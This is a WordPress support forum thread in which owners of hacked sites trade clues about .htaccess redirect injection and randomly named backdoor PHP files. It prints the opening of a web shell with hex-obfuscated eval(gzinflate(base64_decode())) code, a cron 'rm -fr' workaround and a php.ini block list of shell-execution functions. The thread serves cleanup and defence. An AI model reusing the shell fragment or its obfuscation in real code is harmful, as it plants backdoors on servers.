Posted 1 year ago #
Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here's one you can look at, if you search google for harmonyhomes.net and click on the link from Google, you will see that it goes to http://saveprefs.ru/astro/index.php first then to msn.ca. Can anyone please help me find the code? I really don't want to have to try to restore all my sites from backups.
Thank you all.
Jamie
Posted 1 year ago #
Looks like they got into the .htaccess file, not sure how though. Also, I am not sure if they got into any of the other files too?
If I get rid of the hackers code in the .htaccess file, how do I stop it from coming back? The sites are running the latest version (3.3.1), and all the plugins are updated.
Posted 1 year ago #
Looks like its running some kind of code that replaces the redirect code in the .htaccess. I cleaned the code out, uploaded the file, but when I re-download the .htaccess the malicious code is back in there :(
Grrrrrr!!!!!! :(
Posted 1 year ago #
This is currently happening to me as well, I would like to get this fixed as soon as possible.
Posted 1 year ago #
I believe the latest version of wordpress introduced this problem we're all facing. My temporary solution until this if fix is to create a cronjob to delete the .htaccess file since it continues on getting re-created even after it is deleted.
# delete
* * * * * rm -fr ./public_html/.htaccess > /dev/null 2>&1
Posted 1 year ago #
Anyone else here on shared hosting? I am just curious, as I am finding the same .htaccess file in root folders that are not even WP sites.
Wondering if this is a FTP hack rather than a WP hack?
If I delete the file, it gets replace or recreated within 30 minutes or so.
Posted 1 year ago #
I am on shared hosting with hostgator. I sent in a security request to them telling them about the malware on my account and they have been quick to respond.
They believe the cause of the problem is in timthumb.php. A script that many wordpress plugins use for resizing images. They have already fixed up my problem.
Posted 1 year ago #
Hmmm, I had seen a security patch for timthumb.php about 6 months ago or so, so i am not sure that is my problem. I am on 1and1, and they are slow to respond, I have been refered to their "security" team who is only there from 9am-5pm :P
Posted 1 year ago #
same problem but I use zyma, also bad support and slow regarding on this issues...
Posted 1 year ago #
Well, I have the same problem.
I am currently trying to solve everything
Shared hosting in banahosting
Posted 1 year ago #
Ok, so I have been working on this for hours and hours and still no luck. Here is what seems to be happening now:
I picked one of my simple WP installs, one that has is running twenty ten theme, and no plugins running. (its running 3.3.1)
I delete the .htaccess file, but the malicious redirect is still happening, even without an .htaccess file.
When I do a security check at sucuri.net it says:
Malware found on javascript file:
http://ck.jamieedwards.com/404javascript.js
When I look for this file, I can't find it anywhere, there doesn't seem to be a 404javascript.js file anywhere?
Posted 1 year ago #
To quote Esmi with her usual suggested hack readings, perhaps there's a hint for you there.
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Posted 1 year ago #
Thanks Roy, I had looked at these links before, and have read through them at length. I have been working on this for about 7 hours now, and I am more convinced that it is a problem with my shared hosting environment (1and1) but from what I have seen so far, they are absolutely and completely incompitent, and I would highly reccomend not using them for hosting. I have had nothing but bad experiences time after time with them. Their solution for me that they just sent in an email was to "create a .htaccess file and place it in the root of my site". So stupid :(
My problem is, if I am to change hosting providers, then my sites are still messed up, i need to figure out how to clean out the malware, and see if 1and1 can plug the holes, or look at the crappy task of moving all my sites over to somewhere else. So lame :(
Posted 1 year ago #
Also, when you replace your .htaccess file(s) set them to a file permission of 444 or something similar so that no one can write to them.
Posted 1 year ago #
I registered here so I could help you. I had this exact problem and found this page with Google.
There was a PHP file in my main directory that had a weird file name. I first deleted that and changed my FTP/cPanel passwords. I also had to delete the added crap that was in EVERY .htaccess file within my site -- it's all identical and was probably placed by a bot. There is something at the top and at the very bottom of each file(be sure to scroll ALL the way down).
I noticed that my site was still being redirected and was failing the test on http://sitecheck.sucuri.net so I added a 404 redirect link in my .htaccess file and that fixed it! Let me know if this works for you
Posted 1 year ago #
BTW, when I say that I added a "404 redirect link", I mean that I added a line similar to this in my .htaccess file:
ErrorDocument 404 /example-404.html
Posted 1 year ago #
Ok, awesome, thanks impackt, I just noticed that I missed something way down at the bottom of the .htaccess file that was giving a 404 error. I have cleaned out everything that I can find that is obvious in the .htaccess file. I have changed my FTP and my cPanel passwords too.
I have looked through every folder looking for any unusually named files, but can't find any. I will keep looking.
Thanks so much for registering here to help, I appreciate it lots.
Posted 1 year ago #
Also, thanks Mickey, i have set the permissions to 444, we'll see if that stops the files from being overwritten ever 30 minutes or so...
Posted 1 year ago #
You're welcome!
I wish I could tell you what the file name was, but I deleted it the second that I noticed it -- it was mostly composed of random numbers.
I'll post in a few hours to let you know if my site is still clean
Posted 1 year ago #
I saw another post somewhere else tonight that mentioned the same thing. I however haven't seen anything of the sorts, also, i would imagine it would have a similar last modified date as the new corrupted .htaccess file (today's date). The other post said to look for something with a name of something like ws2043124.php or something like that. I will keep looking :)
Posted 1 year ago #
Hello together,
same issues on my site! I found these post quite useful: http://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en
I looked for similar php-files and found a lot, e. g.:
-rw-r--r-- 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
-rw-r--r-- 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
-rw-r--r-- 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
-rw-r--r-- 1 www-data www-data 23289 16. Jan 11:36 w40138369n.php
and much more.
Unfortunately, I couldn't understand the content. It starts with:
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk ...
If anybody could or is interested in such a file for diagnostics I could send by email.
What I have done now is:
- Checking for unknown system users (wasn't any)
- Changing all system passwords (root and users)
- Changing mysql root password
- Changing all mysql user passwords
I realized, that every some minutes, the .htaccess-files will be updated. My plan now is:
- to identify all w??????????n.php-files and delete them (all are under Apache DocumentRoot).
- to delete unnecessary .htaccess-files or delete unwanted content in these .htaccess-files.
- check, if the update of .htaccess-files will continue or is stopped.
Keep fingers cross, that this will help!
Posted 1 year ago #
Funny thing that php-ids.org is hacked too.
code that you are posted is decoded to :
eval(gzinflate(base64_decode('7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk ...
which is mean: execute some shit that ziped in base64.
P.S.
@p-mt, could you please upload one of malicious file from your system to pastebin.com and post link here. It seems like mass attack, so we need to know what to expect.
Posted 1 year ago #
Hi there, i got the same issues here.. >>>,<
Have tried most of the things that been talked here.
but until now still get played by this damn crap hacker....
:(((
Posted 1 year ago #
Hi Old_fart,
here you can find content of "w11756090n.php": w11756090n.php
Posted 1 year ago #
Thanks, I will take a look on it, but you all who got this shit need to do following steps:
1. locate your php.ini file
2. replace there
disable_functions =
to
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"
3. force to restart http server
Posted 1 year ago #
do you think, wordpress will work after that??
Posted 1 year ago #
no search results found from searching the "w11756090n.php" here..
instead i found a suspicious file in my /wp-content/themename/temp folder. . the file named: 303ca5097ae43fd8583179bae0b9aed8.php
Hi old-fard, yea i have the same question..
Posted 1 year ago #
My site is still clean and passing the test( http://sitecheck.sucuri.net/scanner/ ) since I fixed it 6 hours ago.
Has anyone else had any luck with my method?
Posted 1 year ago #
just know all my .htaccess get shitted again with this crap.. :(
i couldn't find any suspicious file more..
hi impackt, I am sorry.. I still couldn't understand how to do your method.. All I know that all the .htaccess files will always be edited by this shit.. Can you explained it in more detail? I'd really love to try..
Thanks before..
Posted 1 year ago #
@p-mt wrote "do you think, wordpress will work after that??"
Mine is working. There could be some plugins that use those functions, but all of them should be avoided. You may search for that functions through all wordpress's php files, but legal application rarely use that funcs.
@richardlin File names generated by virus is unique cuz it made with help of random generator.
@impackt As I can see from virus code - it reply with redirected link to search engines bots ONLY and obviously will not discover itself to well known scanner. sitecheck.sucuri.net can check only produced by PHP code output, but it can't examine your file system. You can download to Firefox plugin "User agent switcher" and check your site with user agent set to "Google" or "Slurp" or "MSNBot" or "ia_archiver" or "Yandex" or "Rambler"
This topic has been closed to new replies.
